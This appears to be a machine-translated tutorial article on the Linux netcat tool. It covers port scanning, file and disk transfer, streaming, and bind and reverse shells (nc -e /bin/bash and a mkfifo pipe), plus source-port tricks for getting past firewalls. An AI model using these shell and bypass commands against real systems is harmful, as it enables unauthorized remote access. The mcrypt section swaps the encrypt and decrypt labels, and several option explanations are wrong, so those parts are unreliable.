LinuxNetcat command: Swiss Army knife in network tools

Netcat is the Swiss Army knife in the network tool. it can read and write data in the network through TCP and UDP. By combining with other tools and redirection, you can use it in multiple ways in the script. What the Netcat command can do is surprising. What Netcat does is to create

Netcat is the Swiss Army knife in the network tool. it can read and write data in the network through TCP and UDP. By combining with other tools and redirection, you can use it in multiple ways in the script. What the Netcat command can do is surprising.

What Netcat does is to establish a link between two computers and return two data streams. what Netcat can do after that depends on your imagination. You can create a server, transfer files, chat with friends, transfer streaming media or use it as an independent client for other protocols.

Here are some examples of using Netcat.

[A (172.31.100.7) B (172.31.100.23)]

Linux Netcat command instance:

1. Port scanning

Port scanning is often used by system administrators and hackers to discover open ports on some machines to help them identify system vulnerabilities.

$nc -z -v -n 172.31.100.7 21-25

It can run in TCP or UDP mode. the default value is TCP, and the-u parameter is adjusted to udp.

• The z parameter tells Netcat to use 0 IO, which means that once the connection is closed, data exchange is not performed)
• The v parameter indicates the use of redundancy options)
• The n parameter tells Netcat not to use DNS to reverse query the domain name of the IP address

This command prints all open ports from 21 to 25. A Banner is a text message sent to you by a service you connect. When you try to identify vulnerabilities or service types and versions, the Banner information is very useful. However, not all services send banner messages.

Once you find open ports, you can easily use the Netcat connection service to capture their banner.

$ nc -v 172.31.100.7 21

The Netcat command will connect to open port 21 and print the banner information of the service running on this port.

Chat Server

If you want to talk to your friends, there are a lot of software and information services available for you. However, if you do not have such a luxury configuration, such as your computer lab, all external connections are restricted. how do you communicate with friends sitting in the next room all day? Don't be depressed. Netcat provides such a method. you only need to create a Chat server and a pre-determined port so that he can contact you.

Server

$nc -l 1567

The Netcat command starts a tcp server on port 1567. all standard output and input are output to this port. Both the output and input are displayed in this shell.

Client

$nc 172.31.100.7 1567

Whatever you type on Machine B will appear on machine.

3. file transmission

Most of the time, we are trying to transfer files through the network or other tools. There are many methods, such as FTP, SCP, SMB, etc. but when you only need to transfer files temporarily or once, it is really worth a waste of time to install and configure a software on your machine. Assume that you want to upload A file File.txt from A to B. Both A and B can be used as servers or clients. below, let A be the server and B be the client.

Server

$nc -l 1567 < file.txt

Client

$nc -n 172.31.100.7 1567 > file.txt

In this case, we created a server on server A and directed the netcatinput file File.txt. Netcat will send the file content when any server is successfully connected to this port.

At the client end, we output to File.txt. when B connects to a, A sends the file content, and B saves the file content to File.txt.

There is no need to create a file source as the Server, and we can use it in the opposite way. As shown below, we send files from B to A, but the server is created on A. This time, we only need to redirect the output of Netcat and redirect the input file of B.

B as Server

Server

$nc -l 1567 > file.txt

Client

nc 172.31.100.23 1567 < file.txt

4. Directory transmission

It is easy to send a file, but if we want to send multiple files or the entire directory, it is as simple as that. we only need to use the compressed tool tar to compress and then send the compressed package.

If you want to transmit A directory from A to B over the network.

Server

$tar -cvf – dir_name | nc -l 1567

Client

$nc -n 172.31.100.7 1567 | tar -xvf -

Here on server A, we create A tar archive package and redirect it through-in the console, and then use the pipeline to redirect it to Netcat. Netcat can send it over the network.

On the client side, download the compressed package through the Netcat pipeline and open the file.

If you want to save the bandwidth transfer package, you can use bzip2 or another tool to compress it.

Server

$tar -cvf – dir_name| bzip2 -z | nc -l 1567

Compress with bzip2

Client

$nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf -

Use bzip2 for decompression

5. encrypt the data you send over the network

If you are worried about the security of data sent over the network, you can use mcrypt-like tools for encryption before sending your data.

Server

$nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt

Use mcrypt to encrypt data.

Client

$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567

Use mcrypt to decrypt data.

The above two commands will prompt the need for a password to ensure that the two ends use the same password.

Here we use mcrypt for encryption, and can use any other encryption tool.

6. stream video

Although it is not the best way to generate stream videos, we still hope to do this if there is no specific tool on the server and Netcat is used.

Server

$cat video.avi | nc -l 1567

Here we only read from a video file and redirect the output to the Netcat client.

$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -

Here we read data from the socket and redirect it to mplayer.

7. Clone a device

If you have already installed and configured a Linux machine and need to repeat the same operation on other machines, you do not want to repeat the configuration again. You do not need to repeat the installation process. you only need to start some boot drives on the other machine and clone your machine.

Cloning a Linux PC is simple. assume that your system is on the disk/dev/sda.

Server

$dd if=/dev/sda | nc -l 1567

Client

$nc -n 172.31.100.7 1567 | dd of=/dev/sda

Dd is a tool for reading raw data from a disk. I use the Netcat server to redirect its output to other machines and write it to the disk. it copies all the information along with the partition table. However, if we have already done partitions and only need to clone the root partition, we can change sda to sda1 and sda2. based on the location of the root partition in our system.

8. open a shell

We have used remote shell-use telnet and ssh, but if these two commands are not installed and we do not have the permission to install them, we can also use Netcat to create a remote shell.

Assume that your Netcat supports the-c-e parameter (default: Netcat)

Server

$nc -l 1567 -e /bin/bash -i

Client

$nc 172.31.100.7 1567

Here we have created a Netcat server and run/bin/bash when the connection is successful.

If Netcat does not support the-c or-e parameter (openbsd Netcat), we can still create a remote shell.

Server

$mkfifo /tmp/tmp_fifo$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo

Here we create a fifo file and use the pipeline command to direct the content of the fifo file to shell 2> & 1. Is used to redirect the standard error output and standard output, and then pipe it to port 1567 running on Netcat. So far, we have redirected the Netcat output to the fifo file.

Note: input received from the network is written to the fifo file.

• The cat command reads the fifo file and sends the content to the sh command.
• Sh command process is input and written back to Netcat.
• Netcat sends data to the client over the network

As for the reason why the pipeline causes parallel command execution, the fifo file is used to replace the normal file, because the fifo enables read wait and if it is a common file, the cat command ends and starts reading empty files as soon as possible.

9. simply connect to the server on the client

Client

$nc -n 172.31.100.7 1567

You will get a shell prompt on the client

Reverse shell

Reverse shell is the shell that people once opened on the client. The reverse shell name is different from other configurations. here, the server uses the services provided by the customer.

Server

$nc -l 1567

On the client side, it is easy to tell Netcat to execute shell after the connection is complete.

Client

$nc 172.31.100.7 1567 -e /bin/bash

What is the special feature of reverse shell?

Reverse shell is often used to bypass firewall restrictions, such as blocking inbound connections. For example, if I have a dedicated IP address of 172.31.100.7, I use a proxy server to connect to the external network. If I want to access this machine from outside the network, such as the shell of 1.2.3.4, I will use reverse shells for this purpose.

10. specify the source port

If your Firewall filters all ports except port 25, you must use the-p option to specify the source port.

Server

$nc -l 1567

Client

$nc 172.31.100.7 1567 -p 25

Root permission is required to use ports less than 1024.

This command will enable port 25 on the client for communication, otherwise it will use a random port.

11. specify the source address

Assume that your machine has multiple addresses and you want to specify which address is used for external data communication. You can use the-s option in Netcat to specify an IP address.

Server

$nc -u -l 1567 < file.txt

Client

$nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt

This command binds the address 172.31.100.5.

This is just some examples of using Netcat.

Other purposes:

• Use the-t option to simulate the Telnet client,
• The HTTP client is used to download files,
• Connect to the mail server and use the SMTP protocol to check the mail,
• Use ffmpeg to capture the screen and share it through stream transmission. Others are more versatile.

To put it simply, as long as you understand the protocol, you can use Netcat as the network communication medium to implement various clients.